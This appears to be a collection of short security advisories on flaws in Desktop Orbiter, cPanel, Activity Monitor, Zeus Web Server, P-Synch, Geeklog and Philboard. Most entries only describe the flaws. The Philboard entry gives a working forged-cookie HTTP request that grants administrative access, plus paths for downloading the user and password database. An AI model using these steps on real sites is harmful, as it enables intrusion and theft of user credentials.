A denial of service vulnerability has been reported for Desktop Orbiter. The vulnerability exists due to the way the application handles connections. Specifically, for every open connection, a snapshot preview of the desktop is loaded into memory. Thus, numerous connections would result in a consumption of all available memory resources.
It has been reported that cPanel is prone to an issue where a remote attacker may bypass cPanel Formail-clone local domain checks and have untrusted e-mail delivered in the context of the vulnerable host. This issue may be exploited by an attacker to use the vulnerable host as an open relay.
A vulnerability has been reported for Activity Monitor 2002 that may be exploited to remotely trigger a denial of service condition. The problem occurs while handling data received from hosts that are not registered in the Activity Monitor 'monitoring list'. A remote attacker may exploit this vulnerability to crash a remote Activity Monitor service, effectively triggering a persistent denial of service condition.
The Zeus Web Server contains a web based administration interface that is vulnerable to cross site scripting attacks. Due to insufficient sanitization of user-supplied input, it is possible for an attacker to construct a malicious link which contains arbitrary HTML and script code, which will be executed in the web client of a user who visits the malicious link. It should be noted that the user must authenticate with the administrative interface for the attack to succeed.
P-Synch is vulnerable to a remote file include vulnerability due to insufficient sanitization of user-supplied URI variables. An attacker can exploit this vulnerability by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for a specific URI parameter.
A remote file include vulnerability has been reported for P-Synch, due to insufficient sanitization of some user-supplied URI variables. An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for a specific URI parameter.
P-Synch does not adequately filter HTML code from URL parameters, making it prone to cross-site scripting attacks. Code will be executed in the security context of the system running P-Synch. This may enable a remote attacker to steal cookie-based authentication credentials from legitimate users. Other attacks are also possible.
Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences.
A vulnerability has been discovered in the 'philboard_admin.asp' script used by Philboard. The problem occurs during authentication and may allow an attacker to gain unauthorized administrative access. The issue presents itself when handling cookie-based authentication credentials. By gaining administrative access an attacker may be capable of carrying out a variety of attacks. It should be noted that although this vulnerability has been reported to affect philboard version 1.14 previous versions might also be affected. Use telnet and open target on port 80 GET /board/philboard_admin.asp HTTP/1.0 Host: example.com Cookie: philboard_admin=True; Download the database (users and password): Usually, the database location can be found and download it from: http://www.target.com/database/philboard.mdb or http://www.target.com/forum/database/philboard.mdb
An attacker may make a malicious HTTP request for specific P-Synch executables passing an empty URI parameter to trigger the condition. This will likely cause P-Sync to display an error message containing the path to the executable.
Services By CQR